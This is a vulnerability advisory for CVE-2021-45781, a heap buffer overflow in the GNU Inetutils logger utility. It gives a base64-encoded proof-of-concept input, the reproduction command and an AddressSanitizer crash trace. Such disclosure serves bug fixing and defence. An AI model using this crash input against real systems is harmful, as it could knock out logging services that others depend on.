Headline
CVE-2021-45781: Heap-based Buffer Overflow in logger
GNU Inetutils 2.2.16-cf091 was discovered to contain a heap-based buffer overflow via the component logger at inetutils/src/logger.c.
# Heap-based Buffer Overflow in logger
## Description
Heap-based Buffer Overflow in logger at inetutils/src/logger.c:329
**version**
```
./logger --version
logger (GNU inetutils) 2.2.16-cf091
Copyright © 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later https://gnu.org/licenses/gpl.html\.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Written by Sergey Poznyakoff.
```
**System information**
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz
**poc**
```
base64 poc
ZYdn/3JycmMjY2NPcnJjI2NjTwCAAAoAAIAAAABECm5vjAB9UQpubm9ybREqGzZNaYSEKhs2TWmE
hHY=
```
**command**
```
./logger -s < ./poc
```
**Result**
```
./logger -s < ./poc
e�g�rrrc#ccOrrc#ccO
=================================================================
==4156==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000003f at pc 0x0000004c679b bp 0x7ffe5f3b7250 sp 0x7ffe5f3b7248
READ of size 1 at 0x60c00000003f thread T0
#0 0x4c679a in send_to_syslog /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:329:11
#1 0x4c5cf2 in main /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:511:2
#2 0x7fa5804200b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/…/csu/libc-start.c:308:16
#3 0x41c46d in _start (/root/disk2/fuzzing/inetutils/fuzz/bin/logger+0x41c46d)
0x60c00000003f is located 1 bytes to the left of 120-byte region [0x60c000000040,0x60c0000000b8)
allocated by thread T0 here:
#0 0x494bad in malloc (/root/disk2/fuzzing/inetutils/fuzz/bin/logger+0x494bad)
#1 0x7fa58047f6c3 in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:62:27
#2 0x8000000000000005 (<unknown module>)
SUMMARY: AddressSanitizer: heap-buffer-overflow /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:329:11 in send_to_syslog
Shadow bytes around the buggy address:
0x0c187fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c187fff8000: fa fa fa fa fa fa fa[fa]00 00 00 00 00 00 00 00
0x0c187fff8010: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
0x0c187fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==4156==ABORTING
```